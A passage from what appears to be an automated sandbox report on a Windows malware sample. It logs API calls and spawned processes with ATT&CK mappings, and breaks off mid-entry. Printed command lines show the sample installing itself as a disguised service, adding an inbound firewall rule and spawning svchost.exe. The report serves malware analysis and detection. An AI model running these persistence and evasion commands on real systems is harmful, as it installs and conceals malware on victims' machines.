\"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00002944)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00002340)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00002340)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetBestInterface (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00002972)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00002972)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e016a@ADVAPI32.dll\"\n \"0e000f00703f016a@ADVAPI32.dll\"\n \"0e000f00cc3f016a@ADVAPI32.dll\"\n \"11001200b447016a@ADVAPI32.dll\"\n \"110012004848016a@ADVAPI32.dll\"\n \"120013008c48016a@ADVAPI32.dll\"\n \"12001300e448016a@ADVAPI32.dll\"\n \"14001500dc6f016a@ADVAPI32.dll\"\n \"14001500f46f016a@ADVAPI32.dll\"\n \"140015000c70016a@ADVAPI32.dll\"\n \"170018002470016a@ADVAPI32.dll\"\n \"0d000e003c70016a@ADVAPI32.dll\"\n \"110012004c70016a@ADVAPI32.dll\"\n \"110012006070016a@ADVAPI32.dll\"\n \"0d000e003449016a@SHELL32.dll\"\n \"0d000e00b049016a@SHELL32.dll\"\n \"0f001000a071016a@ADVAPI32.dll\"\n \"14001500e071016a@ADVAPI32.dll\"\n \"14001500f871016a@ADVAPI32.dll\"\n \"0c000d004072016a@ADVAPI32.dll\"\n \"0c000d005072016a@ADVAPI32.dll\"\n \"0e000f006072016a@ADVAPI32.dll\"\n \"0e000f007072016a@ADVAPI32.dll\"\n \"0b000c008072016a@ADVAPI32.dll\"\n \"14001500b473016a@SETUPAPI.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002544)\n \"cmd.exe\" called \"CreateDirectoryW\" with parameter %WINDIR%\\system32\\njrbicei\\ (UID: 00000000-00003068)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75570000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75570000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75570000\n \"ulhofeim.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75570000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75570000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75570000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\njrbicei\\\" - (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\ulhofeim.exe\" %WINDIR%\\system32\\njrbicei\\\" - (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create njrbicei binPath= \"%WINDIR%\\system32\\njrbicei\\ulhofeim.exe /d\\\"C:\\25153247a5bb3a232e051b5fcc\" - (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description njrbicei \"wifi internet conection\"\" - (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start njrbicei\" - (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00002544)\n \"ulhofeim.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00002944)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ulhofeim.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"ulhofeim.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ulhofeim.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ulhofeim.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00003068)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\ulhofeim.exe\" %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00004276)\n Spawned process \"sc.exe\" with commandline \"create njrbicei binPath= \"%WINDIR%\\\\system32\\\\njrbicei\\\\ulhofeim ...\" (UID: 00000000-00003996), Spawned process \"sc.exe\" with commandline \"description njrbicei \"wifi internet conection\"\" (UID: 00000000-00002188), Spawned process \"sc.exe\" with commandline \"start njrbicei\" (UID: 00000000-00002912), Spawned process \"ulhofeim.exe\" with commandline \"/d\"C:\\\\25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac ...\" (UID: 00000000-00002944)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00002340), Spawned process \"svchost.exe\" (UID: 00000000-00002972)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00003068)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\ulhofeim.exe\" %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00004276)\n Spawned process \"sc.exe\" with commandline \"create njrbicei binPath= \"%WINDIR%\\\\system32\\\\njrbicei\\\\ulhofeim ...\" (UID: 00000000-00003996), Spawned process \"sc.exe\" with commandline \"description njrbicei \"wifi internet conection\"\" (UID: 00000000-00002188), Spawned process \"sc.exe\" with commandline \"start njrbicei\" (UID: 00000000-00002912), Spawned process \"ulhofeim.exe\" with commandline \"/d\"C:\\\\25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac ...\" (UID: 00000000-00002944)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00002340), Spawned process \"svchost.exe\" (UID: 00000000-00002972)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"cmd.exe\" (UID: 00000000-00003068) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"cmd.exe\" (UID: 00000000-00003068) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"ulhofeim.exe\" (UID: 00000000-00002944) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"ulhofeim.exe\" (UID: 00000000-00002944) was launched with missing environment variables: \"LOGONSERVER, USERDNSDOMAIN, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00002340) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", USERDNSDOMAIN=\"%OSUSER%-PC\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00002340) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"svchost.exe\" (UID: 00000000-00002972) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, USERDNSDOMAIN, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00002972) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-275", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a named pipe", "description": "\"svchost.exe\" called \"CreateNamedPipeA\" with parameter \"\\\\.\\pipe\\uqyipjlp\"\n dwOpenMode: \"1073741827\"\n dwPipeMode: \"0\" - (UID: 